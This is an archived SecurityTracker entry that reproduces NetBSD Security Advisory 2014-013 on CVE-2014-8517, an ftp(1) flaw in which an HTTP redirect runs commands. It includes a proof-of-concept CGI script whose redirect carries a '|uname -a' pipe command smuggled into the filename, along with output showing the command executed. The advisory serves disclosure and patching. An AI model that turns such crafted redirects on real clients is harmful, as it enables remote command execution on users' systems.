SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (File Transfer/Sharing)  >   FTP (Generic) Vendors:   NetBSD
(NetBSD Issues Fix) BSD FTP Client HTTP Redirect Flaw Lets Remote Servers Execute Arbitrary Commands on the Target User's System
SecurityTracker Alert ID:  1031154
SecurityTracker URL:  http://securitytracker.com/id/1031154
CVE Reference:   CVE-2014-8517   (Links to External Site)
Date:  Nov 3 2014
Impact:   Execution of arbitrary code via network, User access via network
Fix Available:  Yes  Vendor Confirmed:  Yes  Exploit Included:  Yes  

Description:   A vulnerability was reported in some BSD-based FTP clients. A remote user can cause arbitrary commands to be executed on the target user's system.

A remote FTP server can return a specially crafted HTTP redirect to a connected client to cause the target client to execute arbitrary commands on the target system.

The vulnerability can be triggered in response to an FTP command for an HTTP resource when '-o' (output file) is not specified.

NetBSD tnftp(1) is affected. In NetBSD, the vulnerability resides in 'src/usr.bin/ftp/fetch.c'.

Apple OS X is affected.

FreeBSD is affected.

OpenBSD is not affected.

Other BSD-based systems may be affected.

Jared Mcneill reported this vulnerability.

Impact:   A remote user can cause arbitrary commands to be executed on the target connected user's system.
Solution:   NetBSD has issued a fix.

The NetBSD advisory is available at:

http://ftp.NetBSD.org/pub/NetBSD/security/advisories/NetBSD-SA2014-013.txt.asc

Vendor URL:  cxsecurity.com/issue/WLB-2014100174 (Links to External Site)
Cause:   Access control error
Underlying OS:  UNIX (NetBSD)
Underlying OS Comments:  5.1, 5.2, 6.0, 6.1

Message History:   This archive entry is a follow-up to the message listed below.
Oct 30 2014 BSD FTP Client HTTP Redirect Flaw Lets Remote Servers Execute Arbitrary Commands on the Target User's System



 Source Message Contents

Subject:  NetBSD Security Advisory 2014-013: ftp(1) can be made to execute arbitrary commands by a malicious webserver

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

		NetBSD Security Advisory 2014-013
		=================================

Topic:		ftp(1) can be made to execute arbitrary commands
		by a malicious webserver


Version:	NetBSD-current:		source prior to Oct 27th, 2014
		NetBSD 6.1 - 6.1.5:	affected
		NetBSD 6.0 - 6.0.6:	affected
		NetBSD 5.1 - 5.1.4:	affected
		NetBSD 5.2 - 5.2.2:	affected
		pkgsrc (net/tnftp)	affected

Severity:	remote command execution

Fixed:		NetBSD-current:		Oct 26th, 2014
		NetBSD-7 branch:	Oct 26th, 2014
		NetBSD-6-0 branch:	Oct 27th, 2014
		NetBSD-6-1 branch:	Oct 27th, 2014
		NetBSD-6 branch:	Oct 27th, 2014
		NetBSD-5-2 branch:	Oct 27th, 2014
		NetBSD-5-1 branch:	Oct 27th, 2014
		NetBSD-5 branch:	Oct 27th, 2014
		pkgsrc:			in version 20141031

Teeny versions released later than the fix date will contain the fix.

Please note that NetBSD releases prior to 5.1 are no longer supported.
It is recommended that all users upgrade to a supported release.


Abstract
========

A malicious http server can cause ftp(1) to execute arbitrary commands.

This vulnerability has been assigned CVE-2014-8517.


Technical Details
=================

If the ftp(1) program is used to act as http client and fetch data from
a website, and no output file is passed via the -o argument, the client
can be tricked into executing arbitrary commands.
When acting as http client, the ftp(1) program will follow http redirects,
and uses the part of the path after the last '/' from the last resource
it accesses as the output filename (as long as -o filename is not
specified).

After the output filename is resolved by the ftp client, if the rest
of the output filename begins with a '|', the output filename is
passed to popen(3).

Thus, a malicious web site could hide '|command' in a redirect and make
the client execute 'command' when ftp fetched that URL.

     a20$ pwd
     /var/www/cgi-bin
     a20$ ls -l
     total 4
     -rwxr-xr-x  1 root  wheel  159 Oct 14 02:02 redirect
     -rwxr-xr-x  1 root  wheel  178 Oct 14 01:54 |uname -a
     a20$ cat redirect
     #!/bin/sh
     echo 'Status: 302 Found'
     echo 'Content-Type: text/html'
     echo 'Connection: keep-alive'
     echo 'Location: http://192.168.2.19/cgi-bin/|uname%20-a'
     echo
     a20$

     a20$ ftp http://localhost/cgi-bin/redirect
     Trying ::1:80 ...
     ftp: Can't connect to `::1:80': Connection refused
     Trying 127.0.0.1:80 ...
     Requesting http://localhost/cgi-bin/redirect
     Redirected to http://192.168.2.19/cgi-bin/|uname%20-a
     Requesting http://192.168.2.19/cgi-bin/|uname%20-a
         32      101.46 KiB/s
     32 bytes retrieved in 00:00 (78.51 KiB/s)
     NetBSD a20 7.99.1 NetBSD 7.99.1 (CUBIEBOARD) #113: Sun Oct 26 12:05:36
     ADT 2014
     Jared@Jared-PC:/cygdrive/d/netbsd/src/sys/arch/evbarm/compile/obj/CUBIE
     BOARD evbarm
     a20$


Solutions and Workarounds
=========================

Workaround: specifying an output filename by using "ftp -o <filename>"
circumvents the issue.

Solution:
Get a new ftp binary:

VERS being your NetBSD version
DATE being a build date past the fix date for your version
ARCH being your machine architecture
ftp -o /var/tmp/base.tgz http://nyftp.netbsd.org/pub/NetBSD-daily/VERS/DATE/ARCH/binary/sets/base.tgz
cd /
tar xzpf /var/tmp/base.tgz ./usr/bin/ftp

or build a new ftp binary from source.

Affected file: src/usr.bin/ftp/fetch.c
Fixed versions:
HEAD         1.206
netbsd-7     1.205.4.1
netbsd-6     1.195.2.2
netbsd-6-1   1.195.8.1
netbsd-6-0   1.195.6.1
netbsd-5     1.185.6.3
netbsd-5-2   1.185.6.2.4.1
netbsd-5-1   1.185.14.1



Thanks To
=========

Thanks to Jared McNeill, who found the issue by code inspection, and
Christos Zoulas for changing ftp(1) to only use | commands for user
supplied names.


Revision History
================

	2014-11-03	Initial release


More Information
================

Advisories may be updated as new information becomes available.
The most recent version of this advisory (PGP signed) can be found at 
  http://ftp.NetBSD.org/pub/NetBSD/security/advisories/NetBSD-SA2014-013.txt.asc

Information about NetBSD and NetBSD security can be found at
http://www.NetBSD.org/ and http://www.NetBSD.org/Security/ .


Copyright 2014, The NetBSD Foundation, Inc.  All Rights Reserved.
Redistribution permitted only in full, unmodified form.

$NetBSD: NetBSD-SA2014-013.txt,v 1.1 2014/11/02 22:17:45 spz Exp $

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.15 (NetBSD)

iQIcBAEBAgAGBQJUV/DOAAoJEAZJc6xMSnBuWXsP/0JHubPskhuwiD04WK3QKqxS
7pI2767yoGuXQwdzEiIYiy2h3Fu8nc/ajLEeUwBn4opEI2tXOTkspjdMO+zqFN+Z
vl53ohkfVbRu9lgNIrwhXNrdqMa4RUZDbeurjHtwL27Jie/Pn34S+F1KW3Y8HF9Z
+byMgh/NQ0MVtntekjsji1K1v2RLCeFtj/fqPNT5qS0V9Q3YAfga2k7YJLpt1gVF
ELJBXLdc9E1V0F8fmq6KMVWgAQbNOwblTsmFEJB6dzTsDq8S1uJMeiRSOxYcwIAL
0SR3por56VO+T+55cxCiE6dDgG1gXrSO/4E+Qg/7EartswwGNGCKdLL/8uouEa4z
MWVpI9n8SqcunbhOMfs6RiMvCc8IU+IZUm5oafwZg6UcgesFVv+svv5yOFEWx9Ao
WQjoUrENY04P2fDHaA8wNWOgNltTqlRlghUUd/1BFABdRdZVy9GSs4q/dFkX9u2K
O/+584pAiUPJO5TvF21GkRCWXkAx8xBXpKvIWTquIyf1zMX0YwRdLC86eLScLJX+
30pl49nJnf0QMIcucdl2BLp+XAtKAwqq4DXCS7TQHLmB2gA6QAmAR1pnjuKnPesC
AXvzXxV2+JPCQv38N7GAOYVdURObfjhiubCFErWvRkF+fv19cLYxz48knouXbOgR
WDYihwgW4aBgf6EOkXCE
=JRi/
-----END PGP SIGNATURE-----
 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2019, SecurityGlobal.net LLC